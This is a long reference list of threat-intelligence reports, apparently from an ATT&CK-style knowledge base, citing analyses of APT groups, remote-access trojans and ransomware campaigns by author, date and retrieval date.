- Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.
- Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
- Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
- Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
- Galperin, E., et al. (2016, August). I Got a Letter From the Government the Other Day.... Retrieved April 25, 2018.
- Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.
- Patel, K. (2018, March 02). The NanoCore RAT Has Resurfaced From the Sewers. Retrieved November 9, 2018.
- O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
- Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018.
- Grunzweig, J. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.
- Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.
- Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.
- Llimos, N., Pascual, C. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.
- Palotay, D. and Mackenzie, P. (2018, April). SamSam Ransomware Chooses Its Targets Carefully. Retrieved April 15, 2019.
- Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.
- US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
- Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.
- Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.
- Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.
- Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
- Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.
- Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.
- Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.
- Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.
- Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.
- Lee, S.. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019.
- Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.
- Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.
- ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
- Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.
- Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.
- Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.
- Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.
- Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
- Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
- Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
- Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.
- Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.
- Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
- Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.
- Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
- Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.
- US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
- Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieved March 30, 2017.
- Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.
- Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
- Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
- Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.
- Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
- Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
- Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.
- Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.
- Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.
- Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.
- Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.
- Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.
- Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.
- Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
- hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.
- Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.
- Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
- Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
- McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.
- Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
- Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.
- Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
- Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
- SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.
- Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.
- FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.
- Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.
- Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
- Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
- FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.
- FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
- Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.
- Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.
- PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
- Twi1ight. (2015, July 11). AD-Pentest-Script - wmiexec.vbs. Retrieved June 29, 2017.
- Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.
- Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
- Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.
- US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
- US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.
- Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.
- Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.
- Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
- DiMaggio, J.. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.
- Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
- Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.
- Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
- Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
- Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
- ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018.
- FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
- Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
- Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
- Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
- Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.
- Shelmire, A. (2015, July 06). Evasive Maneuvers by the Wekby group with custom ROP-packing and DNS covert channels. Retrieved November 15, 2018.
- Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.
- Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
- Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.
- Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.
- GReAT. (2017, November 1). Silence – a new Trojan attacking financial organizations. Retrieved May 24, 2019.
- Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.
- Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.
- Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
- Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.
- Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
- Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.
- Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.
- Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
- Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
- Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
- Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018.
- Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.
- Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.
- Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
- Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
- Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.
- US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.
- Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.
- Falcone, R., Wilhoit, K.. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.
- Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
- Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.
- Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.